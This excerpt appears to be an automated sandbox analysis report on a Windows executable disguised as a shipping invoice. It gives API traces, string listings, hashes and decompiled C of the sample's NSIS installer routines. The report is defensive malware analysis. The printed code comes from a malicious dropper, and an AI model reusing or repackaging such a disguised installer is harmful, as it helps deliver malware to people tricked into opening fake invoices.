                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                    • API String ID: 1975747703-3928170452
                                                                                                                                    • Opcode ID: 11e40e81066751d087b9ff3905231488129d51ce77e2f765c8d4af6575c4c7bc
                                                                                                                                    • Instruction ID: b26d75f66471b6ab4bde28a110228d97be13954c1219befa950aae33cc908ec8
                                                                                                                                    • Opcode Fuzzy Hash: 11e40e81066751d087b9ff3905231488129d51ce77e2f765c8d4af6575c4c7bc
                                                                                                                                    • Instruction Fuzzy Hash: 3861F6712442007ED620AF669D46F273ABCDB54749F80003FF941B62E2CB7CAD068A2D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E00402E14(void* __eflags, signed int _a4) {
                                                                                                                                    				long _v8;
                                                                                                                                    				long _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				long _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				intOrPtr _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				char _v300;
                                                                                                                                    				signed int _t54;
                                                                                                                                    				void* _t57;
                                                                                                                                    				void* _t62;
                                                                                                                                    				intOrPtr _t65;
                                                                                                                                    				void* _t68;
                                                                                                                                    				intOrPtr* _t70;
                                                                                                                                    				intOrPtr _t71;
                                                                                                                                    				signed int _t77;
                                                                                                                                    				signed int _t82;
                                                                                                                                    				signed int _t83;
                                                                                                                                    				signed int _t89;
                                                                                                                                    				intOrPtr _t92;
                                                                                                                                    				signed int _t100;
                                                                                                                                    				signed int _t102;
                                                                                                                                    				void* _t104;
                                                                                                                                    				signed int _t105;
                                                                                                                                    				signed int _t106;
                                                                                                                                    				signed int _t109;
                                                                                                                                    				void* _t110;
                                                                                                                                    
                                                                                                                                    				_v8 = 0;
                                                                                                                                    				_v12 = 0;
                                                                                                                                    				 *0x42f430 = GetTickCount() + 0x3e8;
                                                                                                                                    				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe", 0x400);
                                                                                                                                    				_t104 = E00405CFF("C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe", 0x80000000, 3);
                                                                                                                                    				 *0x40a018 = _t104;
                                                                                                                                    				if(_t104 == 0xffffffff) {
                                                                                                                                    					return "Error launching installer";
                                                                                                                                    				}
                                                                                                                                    				E00406166("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Shipping INVOICE-BL Shipment..exe");
                                                                                                                                    				E00406166(0x437000, E00405B45("C:\\Users\\jones\\Desktop"));
                                                                                                                                    				_t54 = GetFileSize(_t104, 0);
                                                                                                                                    				__eflags = _t54;
                                                                                                                                    				 *0x429450 = _t54;
                                                                                                                                    				_t109 = _t54;
                                                                                                                                    				if(_t54 <= 0) {
                                                                                                                                    					L22:
                                                                                                                                    					E00402D75(1);
                                                                                                                                    					__eflags =  *0x42f438;
                                                                                                                                    					if( *0x42f438 == 0) {
                                                                                                                                    						goto L30;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _v12;
                                                                                                                                    					if(_v12 == 0) {
                                                                                                                                    						L26:
                                                                                                                                    						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                                                                    						_t110 = _t57;
                                                                                                                                    						_t105 = 8;
                                                                                                                                    						 *0x415438 = 0x40d430;
                                                                                                                                    						 *0x415434 = 0x40d430;
                                                                                                                                    						 *0x40b890 = _t105;
                                                                                                                                    						 *0x40bdac = 0;
                                                                                                                                    						 *0x40bda8 = 0;
                                                                                                                                    						 *0x415430 = 0x415430; // executed
                                                                                                                                    						E00405D2E( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                                                                                                                                    						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                                                                    						__eflags = _t62 - 0xffffffff;
                                                                                                                                    						 *0x40a01c = _t62;
                                                                                                                                    						if(_t62 != 0xffffffff) {
                                                                                                                                    							_t65 = E00403361( *0x42f438 + 0x1c);
                                                                                                                                    							 *0x429454 = _t65;
                                                                                                                                    							 *0x429448 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                                    							_t68 = E004030DA(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                                                                    							__eflags = _t68 - _v20;
                                                                                                                                    							if(_t68 == _v20) {
                                                                                                                                    								__eflags = _v40 & 0x00000001;
                                                                                                                                    								 *0x42f434 = _t110;
                                                                                                                                    								 *0x42f43c =  *_t110;
                                                                                                                                    								if((_v40 & 0x00000001) != 0) {
                                                                                                                                    									 *0x42f440 =  *0x42f440 + 1;
                                                                                                                                    									__eflags =  *0x42f440;
                                                                                                                                    								}
                                                                                                                                    								_t45 = _t110 + 0x44; // 0x44
                                                                                                                                    								_t70 = _t45;
                                                                                                                                    								_t100 = _t105;
                                                                                                                                    								do {
                                                                                                                                    									_t70 = _t70 - _t105;
                                                                                                                                    									 *_t70 =  *_t70 + _t110;
                                                                                                                                    									_t100 = _t100 - 1;
                                                                                                                                    									__eflags = _t100;
                                                                                                                                    								} while (_t100 != 0);
                                                                                                                                    								_t71 =  *0x429444; // 0xa0970
                                                                                                                                    								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                                                                                    								E00405CBA(0x42f460, _t110 + 4, 0x40);
                                                                                                                                    								__eflags = 0;
                                                                                                                                    								return 0;
                                                                                                                                    							}
                                                                                                                                    							goto L30;
                                                                                                                                    						}
                                                                                                                                    						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                                    					}
                                                                                                                                    					E00403361( *0x429440);
                                                                                                                                    					_t77 = E0040334B( &_a4, 4);
                                                                                                                                    					__eflags = _t77;
                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                    						goto L30;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _v8 - _a4;
                                                                                                                                    					if(_v8 != _a4) {
                                                                                                                                    						goto L30;
                                                                                                                                    					}
                                                                                                                                    					goto L26;
                                                                                                                                    				} else {
                                                                                                                                    					do {
                                                                                                                                    						_t106 = _t109;
                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                    						_t82 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                                                                                                                                    						__eflags = _t109 - _t82;
                                                                                                                                    						if(_t109 >= _t82) {
                                                                                                                                    							_t106 = _t82;
                                                                                                                                    						}
                                                                                                                                    						_t83 = E0040334B(0x421440, _t106);
                                                                                                                                    						__eflags = _t83;
                                                                                                                                    						if(_t83 == 0) {
                                                                                                                                    							E00402D75(1);
                                                                                                                                    							L30:
                                                                                                                                    							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                                    						}
                                                                                                                                    						__eflags =  *0x42f438;
                                                                                                                                    						if( *0x42f438 != 0) {
                                                                                                                                    							__eflags = _a4 & 0x00000002;
                                                                                                                                    							if((_a4 & 0x00000002) == 0) {
                                                                                                                                    								E00402D75(0);
                                                                                                                                    							}
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						E00405CBA( &_v40, 0x421440, 0x1c);
                                                                                                                                    						_t89 = _v40;
                                                                                                                                    						__eflags = _t89 & 0xfffffff0;
                                                                                                                                    						if((_t89 & 0xfffffff0) != 0) {
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _v36 - 0xdeadbeef;
                                                                                                                                    						if(_v36 != 0xdeadbeef) {
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _v24 - 0x74736e49;
                                                                                                                                    						if(_v24 != 0x74736e49) {
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _v28 - 0x74666f73;
                                                                                                                                    						if(_v28 != 0x74666f73) {
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _v32 - 0x6c6c754e;
                                                                                                                                    						if(_v32 != 0x6c6c754e) {
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						_a4 = _a4 | _t89;
                                                                                                                                    						_t102 =  *0x429440; // 0xe4ed
                                                                                                                                    						 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                                                                                                                                    						_t92 = _v16;
                                                                                                                                    						__eflags = _t92 - _t109;
                                                                                                                                    						 *0x42f438 = _t102;
                                                                                                                                    						if(_t92 > _t109) {
                                                                                                                                    							goto L30;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _a4 & 0x00000008;
                                                                                                                                    						if((_a4 & 0x00000008) != 0) {
                                                                                                                                    							L15:
                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                    							_t109 = _t92 - 4;
                                                                                                                                    							__eflags = _t106 - _t109;
                                                                                                                                    							if(_t106 > _t109) {
                                                                                                                                    								_t106 = _t109;
                                                                                                                                    							}
                                                                                                                                    							goto L19;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _a4 & 0x00000004;
                                                                                                                                    						if((_a4 & 0x00000004) != 0) {
                                                                                                                                    							goto L22;
                                                                                                                                    						}
                                                                                                                                    						goto L15;
                                                                                                                                    						L19:
                                                                                                                                    						__eflags = _t109 -  *0x429450; // 0xf65d
                                                                                                                                    						if(__eflags < 0) {
                                                                                                                                    							_v8 = E004065B5(_v8, 0x421440, _t106);
                                                                                                                                    						}
                                                                                                                                    						 *0x429440 =  *0x429440 + _t106;
                                                                                                                                    						_t109 = _t109 - _t106;
                                                                                                                                    						__eflags = _t109;
                                                                                                                                    					} while (_t109 != 0);
                                                                                                                                    					goto L22;
                                                                                                                                    				}
                                                                                                                                    			}

                                                                                                                                    0x00402fbb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402fc4
                                                                                                                                    0x00402fc7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402ea2
                                                                                                                                    0x00402ea2
                                                                                                                                    0x00402ea7
                                                                                                                                    0x00402eab
                                                                                                                                    0x00402eb2
                                                                                                                                    0x00402eb7
                                                                                                                                    0x00402eb9
                                                                                                                                    0x00402ebb
                                                                                                                                    0x00402ebb
                                                                                                                                    0x00402ec3
                                                                                                                                    0x00402ec8
                                                                                                                                    0x00402eca
                                                                                                                                    0x0040304b
                                                                                                                                    0x0040308d
                                                                                                                                    0x00000000
                                                                                                                                    0x0040308d
                                                                                                                                    0x00402ed0
                                                                                                                                    0x00402ed6
                                                                                                                                    0x00402f56
                                                                                                                                    0x00402f5a
                                                                                                                                    0x00402f5d
                                                                                                                                    0x00402f62
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f5a
                                                                                                                                    0x00402ee3
                                                                                                                                    0x00402ee8
                                                                                                                                    0x00402eeb
                                                                                                                                    0x00402ef0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402ef2
                                                                                                                                    0x00402ef9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402efb
                                                                                                                                    0x00402f02
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f04
                                                                                                                                    0x00402f0b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f0d
                                                                                                                                    0x00402f14
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f16
                                                                                                                                    0x00402f1c
                                                                                                                                    0x00402f25
                                                                                                                                    0x00402f2b
                                                                                                                                    0x00402f2e
                                                                                                                                    0x00402f30
                                                                                                                                    0x00402f36
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f3c
                                                                                                                                    0x00402f40
                                                                                                                                    0x00402f48
                                                                                                                                    0x00402f48
                                                                                                                                    0x00402f4b
                                                                                                                                    0x00402f4e
                                                                                                                                    0x00402f50
                                                                                                                                    0x00402f52
                                                                                                                                    0x00402f52
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f50
                                                                                                                                    0x00402f42
                                                                                                                                    0x00402f46
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00402f63
                                                                                                                                    0x00402f63
                                                                                                                                    0x00402f69
                                                                                                                                    0x00402f79
                                                                                                                                    0x00402f79
                                                                                                                                    0x00402f7c
                                                                                                                                    0x00402f82
                                                                                                                                    0x00402f82
                                                                                                                                    0x00402f82
                                                                                                                                    0x00000000
                                                                                                                                    0x00402ea2

                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402E28
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,00000400), ref: 00402E44
                                                                                                                                      • Part of subcall function 00405CFF: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405D03
                                                                                                                                      • Part of subcall function 00405CFF: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D25
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00402E8D
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 00402FD2
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00402E64
                                                                                                                                    • Null, xrefs: 00402F0D
                                                                                                                                    • Inst, xrefs: 00402EFB
                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402E6F, 00402E74, 00402E7A
                                                                                                                                    • C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe, xrefs: 00402E2E, 00402E3D, 00402E51, 00402E6E
                                                                                                                                    • p, xrefs: 004030B9
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040308D
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402E1E, 00402FF2
                                                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040303F
                                                                                                                                    • soft, xrefs: 00402F04
                                                                                                                                    • "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" , xrefs: 00402E14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                    • String ID: "C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$p$soft
                                                                                                                                    • API String ID: 2803837635-1799494454
                                                                                                                                    • Opcode ID: 9bef222d6a43c43d5f4d12975c22a7cb7fe6d4270d3fd1e90c43ad95b9de5dcd
                                                                                                                                    • Instruction ID: 28bbd0e13b5f39eb8630a6ef8b1f9e0b653b294dce63aa05062ccd540898c3a3
                                                                                                                                    • Opcode Fuzzy Hash: 9bef222d6a43c43d5f4d12975c22a7cb7fe6d4270d3fd1e90c43ad95b9de5dcd
                                                                                                                                    • Instruction Fuzzy Hash: 70710B31A00205ABDB20AF64DE85B9E7BB8EB04759F90413BF504B72D0D7BC9E458B5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                    			E00406188(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                                                                    				struct _ITEMIDLIST* _v8;
                                                                                                                                    				char _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed char _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed char _v28;
                                                                                                                                    				signed int _t38;
                                                                                                                                    				CHAR* _t39;
                                                                                                                                    				signed int _t41;
                                                                                                                                    				char _t52;
                                                                                                                                    				char _t53;
                                                                                                                                    				char _t55;
                                                                                                                                    				char _t57;
                                                                                                                                    				void* _t65;
                                                                                                                                    				char* _t66;
                                                                                                                                    				signed int _t80;
                                                                                                                                    				intOrPtr _t86;
                                                                                                                                    				char _t88;
                                                                                                                                    				void* _t89;
                                                                                                                                    				CHAR* _t90;
                                                                                                                                    				void* _t92;
                                                                                                                                    				signed int _t97;
                                                                                                                                    				signed int _t99;
                                                                                                                                    				void* _t100;
                                                                                                                                    
                                                                                                                                    				_t92 = __esi;
                                                                                                                                    				_t89 = __edi;
                                                                                                                                    				_t65 = __ebx;
                                                                                                                                    				_t38 = _a8;
                                                                                                                                    				if(_t38 < 0) {
                                                                                                                                    					_t86 =  *0x42ebfc; // 0x671d5f
                                                                                                                                    					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                                                                    				}
                                                                                                                                    				_push(_t65);
                                                                                                                                    				_push(_t92);
                                                                                                                                    				_push(_t89);
                                                                                                                                    				_t66 = _t38 +  *0x42f478;
                                                                                                                                    				_t39 = 0x42e3c0;
                                                                                                                                    				_t90 = 0x42e3c0;
                                                                                                                                    				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
                                                                                                                                    					_t90 = _a4;
                                                                                                                                    					_a4 = _a4 & 0x00000000;
                                                                                                                                    				}
                                                                                                                                    				while(1) {
                                                                                                                                    					_t88 =  *_t66;
                                                                                                                                    					if(_t88 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t90 - _t39 - 0x400;
                                                                                                                                    					if(_t90 - _t39 >= 0x400) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_t66 = _t66 + 1;
                                                                                                                                    					__eflags = _t88 - 4;
                                                                                                                                    					_a8 = _t66;
                                                                                                                                    					if(__eflags >= 0) {
                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                    							 *_t90 = _t88;
                                                                                                                                    							_t90 =  &(_t90[1]);
                                                                                                                                    							__eflags = _t90;
                                                                                                                                    						} else {
                                                                                                                                    							 *_t90 =  *_t66;
                                                                                                                                    							_t90 =  &(_t90[1]);
                                                                                                                                    							_t66 = _t66 + 1;
                                                                                                                                    						}
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					_t41 =  *((char*)(_t66 + 1));
                                                                                                                                    					_t80 =  *_t66;
                                                                                                                                    					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                                                                    					_v24 = _t80;
                                                                                                                                    					_v28 = _t80 | 0x00000080;
                                                                                                                                    					_v16 = _t41;
                                                                                                                                    					_v20 = _t41 | 0x00000080;
                                                                                                                                    					_t66 = _a8 + 2;
                                                                                                                                    					__eflags = _t88 - 2;
                                                                                                                                    					if(_t88 != 2) {
                                                                                                                                    						__eflags = _t88 - 3;
                                                                                                                                    						if(_t88 != 3) {
                                                                                                                                    							__eflags = _t88 - 1;
                                                                                                                                    							if(_t88 == 1) {
                                                                                                                                    								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                                                                    								E00406188(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                                                                    							}
                                                                                                                                    							L42:
                                                                                                                                    							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                                                                    							_t39 = 0x42e3c0;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t97 - 0x1d;
                                                                                                                                    						if(_t97 != 0x1d) {
                                                                                                                                    							__eflags = (_t97 << 0xa) + 0x430000;
                                                                                                                                    							E00406166(_t90, (_t97 << 0xa) + 0x430000);
                                                                                                                                    						} else {
                                                                                                                                    							E004060C4(_t90,  *0x42f428);
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t97 + 0xffffffeb - 7;
                                                                                                                                    						if(_t97 + 0xffffffeb < 7) {
                                                                                                                                    							L33:
                                                                                                                                    							E004063D0(_t90);
                                                                                                                                    						}
                                                                                                                                    						goto L42;
                                                                                                                                    					}
                                                                                                                                    					_t52 =  *0x42f42c;
                                                                                                                                    					__eflags = _t52;
                                                                                                                                    					_t99 = 2;
                                                                                                                                    					if(_t52 >= 0) {
                                                                                                                                    						L13:
                                                                                                                                    						_a8 = 1;
                                                                                                                                    						L14:
                                                                                                                                    						__eflags =  *0x42f4c4;
                                                                                                                                    						if( *0x42f4c4 != 0) {
                                                                                                                                    							_t99 = 4;
                                                                                                                                    						}
                                                                                                                                    						__eflags = _t80;
                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                    							__eflags = _t80 - 0x25;
                                                                                                                                    							if(_t80 != 0x25) {
                                                                                                                                    								__eflags = _t80 - 0x24;
                                                                                                                                    								if(_t80 == 0x24) {
                                                                                                                                    									GetWindowsDirectoryA(_t90, 0x400);
                                                                                                                                    									_t99 = 0;
                                                                                                                                    								}
                                                                                                                                    								while(1) {
                                                                                                                                    									__eflags = _t99;
                                                                                                                                    									if(_t99 == 0) {
                                                                                                                                    										goto L30;
                                                                                                                                    									}
                                                                                                                                    									_t53 =  *0x42f424;
                                                                                                                                    									_t99 = _t99 - 1;
                                                                                                                                    									__eflags = _t53;
                                                                                                                                    									if(_t53 == 0) {
                                                                                                                                    										L26:
                                                                                                                                    										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                                                                    										__eflags = _t55;
                                                                                                                                    										if(_t55 != 0) {
                                                                                                                                    											L28:
                                                                                                                                    											 *_t90 =  *_t90 & 0x00000000;
                                                                                                                                    											__eflags =  *_t90;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                                                                    										_v12 = _t55;
                                                                                                                                    										__imp__CoTaskMemFree(_v8);
                                                                                                                                    										__eflags = _v12;
                                                                                                                                    										if(_v12 != 0) {
                                                                                                                                    											goto L30;
                                                                                                                                    										}
                                                                                                                                    										goto L28;
                                                                                                                                    									}
                                                                                                                                    									__eflags = _a8;
                                                                                                                                    									if(_a8 == 0) {
                                                                                                                                    										goto L26;
                                                                                                                                    									}
                                                                                                                                    									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
                                                                                                                                    									__eflags = _t57;
                                                                                                                                    									if(_t57 == 0) {
                                                                                                                                    										goto L30;
                                                                                                                                    									}
                                                                                                                                    									goto L26;
                                                                                                                                    								}
                                                                                                                                    								goto L30;
                                                                                                                                    							}
                                                                                                                                    							GetSystemDirectoryA(_t90, 0x400);
                                                                                                                                    							goto L30;
                                                                                                                                    						} else {
                                                                                                                                    							E0040604D((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
                                                                                                                                    							__eflags =  *_t90;
                                                                                                                                    							if( *_t90 != 0) {
                                                                                                                                    								L31:
                                                                                                                                    								__eflags = _v16 - 0x1a;
                                                                                                                                    								if(_v16 == 0x1a) {
                                                                                                                                    									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                                                                    								}
                                                                                                                                    								goto L33;
                                                                                                                                    							}
                                                                                                                                    							E00406188(_t66, _t90, _t99, _t90, _v16);
                                                                                                                                    							L30:
                                                                                                                                    							__eflags =  *_t90;
                                                                                                                                    							if( *_t90 == 0) {
                                                                                                                                    								goto L33;
                                                                                                                                    							}
                                                                                                                                    							goto L31;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					__eflags = _t52 - 0x5a04;
                                                                                                                                    					if(_t52 == 0x5a04) {
                                                                                                                                    						goto L13;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _v16 - 0x23;
                                                                                                                                    					if(_v16 == 0x23) {
                                                                                                                                    						goto L13;
                                                                                                                                    					}
                                                                                                                                    					__eflags = _v16 - 0x2e;
                                                                                                                                    					if(_v16 == 0x2e) {
                                                                                                                                    						goto L13;
                                                                                                                                    					} else {
                                                                                                                                    						_a8 = _a8 & 0x00000000;
                                                                                                                                    						goto L14;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				 *_t90 =  *_t90 & 0x00000000;
                                                                                                                                    				if(_a4 == 0) {
                                                                                                                                    					return _t39;
                                                                                                                                    				}
                                                                                                                                    				return E00406166(_a4, _t39);
                                                                                                                                    			}



























                                                                                                                                    0x0040637c
                                                                                                                                    0x00406345
                                                                                                                                    0x00406346
                                                                                                                                    0x00406346
                                                                                                                                    0x00000000
                                                                                                                                    0x0040637c
                                                                                                                                    0x00406236
                                                                                                                                    0x0040623d
                                                                                                                                    0x0040623f
                                                                                                                                    0x00406240
                                                                                                                                    0x0040625a
                                                                                                                                    0x0040625a
                                                                                                                                    0x00406261
                                                                                                                                    0x00406261
                                                                                                                                    0x00406268
                                                                                                                                    0x0040626c
                                                                                                                                    0x0040626c
                                                                                                                                    0x0040626d
                                                                                                                                    0x0040626f
                                                                                                                                    0x004062a8
                                                                                                                                    0x004062ab
                                                                                                                                    0x004062bb
                                                                                                                                    0x004062be
                                                                                                                                    0x004062c6
                                                                                                                                    0x004062cc
                                                                                                                                    0x004062cc
                                                                                                                                    0x0040632b
                                                                                                                                    0x0040632b
                                                                                                                                    0x0040632d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062d0
                                                                                                                                    0x004062d7
                                                                                                                                    0x004062d8
                                                                                                                                    0x004062da
                                                                                                                                    0x004062f4
                                                                                                                                    0x00406302
                                                                                                                                    0x00406308
                                                                                                                                    0x0040630a
                                                                                                                                    0x00406328
                                                                                                                                    0x00406328
                                                                                                                                    0x00406328
                                                                                                                                    0x00000000
                                                                                                                                    0x00406328
                                                                                                                                    0x00406310
                                                                                                                                    0x00406319
                                                                                                                                    0x0040631c
                                                                                                                                    0x00406322
                                                                                                                                    0x00406326
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406326
                                                                                                                                    0x004062dc
                                                                                                                                    0x004062df
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062ee
                                                                                                                                    0x004062f0
                                                                                                                                    0x004062f2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004062f2
                                                                                                                                    0x00000000
                                                                                                                                    0x0040632b
                                                                                                                                    0x004062b3
                                                                                                                                    0x00000000
                                                                                                                                    0x00406271
                                                                                                                                    0x0040628c
                                                                                                                                    0x00406291
                                                                                                                                    0x00406294
                                                                                                                                    0x00406334
                                                                                                                                    0x00406334
                                                                                                                                    0x00406338
                                                                                                                                    0x00406340
                                                                                                                                    0x00406340
                                                                                                                                    0x00000000
                                                                                                                                    0x00406338
                                                                                                                                    0x0040629e
                                                                                                                                    0x0040632f
                                                                                                                                    0x0040632f
                                                                                                                                    0x00406332
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406332
                                                                                                                                    0x0040626f
                                                                                                                                    0x00406242
                                                                                                                                    0x00406246
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00406248
                                                                                                                                    0x0040624c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0040624e
                                                                                                                                    0x00406252
                                                                                                                                    0x00000000
                                                                                                                                    0x00406254
                                                                                                                                    0x00406254
                                                                                                                                    0x00000000
                                                                                                                                    0x00406254
                                                                                                                                    0x00406252
                                                                                                                                    0x004063b7
                                                                                                                                    0x004063c1
                                                                                                                                    0x004063cd
                                                                                                                                    0x004063cd
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\include\net-knjiela\agent,00000400), ref: 004062B3
